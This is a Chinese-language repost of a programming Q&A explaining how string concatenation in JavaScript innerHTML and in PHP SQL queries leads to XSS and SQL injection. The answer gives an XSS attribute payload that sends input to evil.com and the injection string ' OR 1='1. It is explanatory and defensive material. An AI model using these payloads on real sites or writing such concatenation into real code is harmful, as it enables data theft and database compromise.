标签：concatenation security javascript php

最近(在这里)有人告诉我,串联Javascript会导致XSS漏洞.我已经在这里和Google上进行了研究,以找出造成这种情况的原因,但我没有看到.

第1部分-Javascript：显然,这是不安全的方法.为什么？您应该怎么做呢？

// part of a script dynamically making table rows
var el = document.createElement('div');
el.innerHTML = '<input type="text"  id="myId'+id+'"  />';
cellOne.appendChild(el);

第2部分-MySQL：有人告诉您,当您连接SQL时,它将使您遭受SQL注入的攻击.我不确定concat SQL到底是什么意思.我以为他们不是在谈论SQL concat函数.我猜他们的意思是：

$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";

或者可能？

$sql = " SELECT `col` FROM `table` WHERE `col` = '".$myFilteredVariable."' ";
     $sql .= " AND `col2` = '".$myvar.'";

这会使您暴露于SQL注入吗？

SQL部分是学术性的.我使用PDO来防止SQL注入.

解决方法:

第1部分

如果id来自持久存在于页面上的用户输入,则可能是这样.

id变量可能包含…

" onchange="(new Image).src='http://evil.com/user-input=' + this.value;" bla="

第2部分

除非使用正确的机制对这些变量进行转义,否则将存在漏洞.

$myvar变量可能包含…

' OR 1='1

标签：concatenation,security,javascript,php
来源： https://codeday.me/bug/20191202/2085187.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。